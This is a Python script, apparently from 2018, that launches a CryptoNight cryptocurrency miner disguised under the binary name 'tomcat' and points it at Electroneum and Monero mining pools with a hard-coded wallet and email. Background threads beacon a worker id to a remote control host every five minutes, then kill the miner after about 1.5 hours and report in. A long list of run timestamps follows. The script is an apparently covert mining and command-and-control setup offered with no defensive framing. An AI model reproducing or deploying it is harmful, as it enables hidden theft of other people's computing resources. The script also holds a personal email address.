import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:40:06.351797
#2018-02-17 16:26:07.019837
#2018-02-17 18:13:07.308821
#2018-02-17 20:01:01.318716
#2018-02-17 21:49:03.810525
#2018-02-17 23:34:04.914694
#2018-02-18 01:22:07.301478
#2018-02-18 03:09:05.717749
#2018-02-18 04:58:04.471890
#2018-02-18 06:52:04.429745
#2018-02-18 08:41:06.605182
#2018-02-18 10:27:07.087043
#2018-02-18 12:13:06.539311
#2018-02-18 13:59:01.643411
#2018-02-18 15:49:05.055973
#2018-02-18 17:39:06.618719
#2018-02-18 19:27:03.338547
#2018-02-18 21:11:05.060162
#2018-02-18 22:58:04.857748
#2018-02-19 00:46:05.969189
#2018-02-19 02:32:07.427363
#2018-02-19 04:18:07.095085
#2018-02-19 06:03:05.257518
#2018-02-19 07:51:07.452485
#2018-02-19 09:41:04.329905
#2018-02-19 11:31:06.086452
#2018-02-19 13:18:08.913144
#2018-02-19 15:07:08.163387
#2018-02-19 16:54:01.683880
#2018-02-19 18:41:01.676159
#2018-02-19 20:28:05.053988
#2018-02-19 22:15:07.673841
#2018-02-20 00:02:04.989157
#2018-02-20 01:50:08.913732
#2018-02-20 03:39:08.086616
#2018-02-20 05:25:06.418919
#2018-02-20 07:09:08.324063
#2018-02-20 08:54:07.178059
#2018-02-20 10:38:09.095555
#2018-02-20 12:24:07.455253
#2018-02-20 14:12:09.008560
#2018-02-20 15:55:14.139973
#2018-02-20 17:41:02.204874
#2018-02-20 19:29:05.842641
#2018-02-20 21:18:02.052357
#2018-02-20 23:02:03.950312
#2018-02-21 00:47:02.156548
#2018-02-21 02:31:04.576458
#2018-02-21 04:18:06.100144
#2018-02-21 06:06:01.504595
#2018-02-21 07:52:07.289543
#2018-02-21 09:37:07.282039
#2018-02-21 11:25:04.410189
#2018-02-21 13:14:04.685630
#2018-02-21 14:59:10.992670
#2018-02-21 16:48:07.357365
#2018-02-21 18:37:09.088593
#2018-02-21 20:22:06.882722
#2018-02-21 22:09:04.558729
#2018-02-21 23:58:06.381605
#2018-02-22 01:46:05.635579
#2018-02-22 03:34:02.082708
#2018-02-22 05:20:08.897108
#2018-02-22 07:06:04.342000
#2018-02-22 08:52:06.441667
#2018-02-22 10:41:08.511249
#2018-02-22 12:29:01.528322
#2018-02-22 14:13:05.638819
#2018-02-22 16:01:01.906411
#2018-02-22 17:46:12.863760
#2018-02-22 19:33:08.117512
#2018-02-22 21:25:03.227938
#2018-02-22 23:11:01.659882
#2018-02-23 00:57:04.536654
#2018-02-23 02:46:07.633038
#2018-02-23 04:34:07.636010
#2018-02-23 06:20:08.063448
#2018-02-23 08:06:06.627724
#2018-02-23 10:22:01.948219
#2018-02-23 12:17:05.379164
#2018-02-23 14:04:04.803895
#2018-02-23 15:54:04.206719
#2018-02-23 17:39:08.731254
#2018-02-23 19:27:05.988874
#2018-02-23 21:11:06.971090
#2018-02-23 22:58:06.563432
#2018-02-24 00:45:10.620882
#2018-02-24 02:38:06.205477
#2018-02-24 04:32:01.923958
#2018-02-24 06:16:06.727056
#2018-02-24 08:04:06.984633
#2018-02-24 09:47:05.396936
#2018-02-24 11:42:03.734787
#2018-02-24 13:33:05.896959
#2018-02-24 15:21:06.058686
#2018-02-24 17:11:04.939115
#2018-02-24 19:02:07.829101
#2018-02-24 20:49:05.292532
#2018-02-24 23:06:07.524749
#2018-02-25 02:22:07.421627
#2018-02-25 05:34:06.961544
#2018-02-25 11:34:07.998581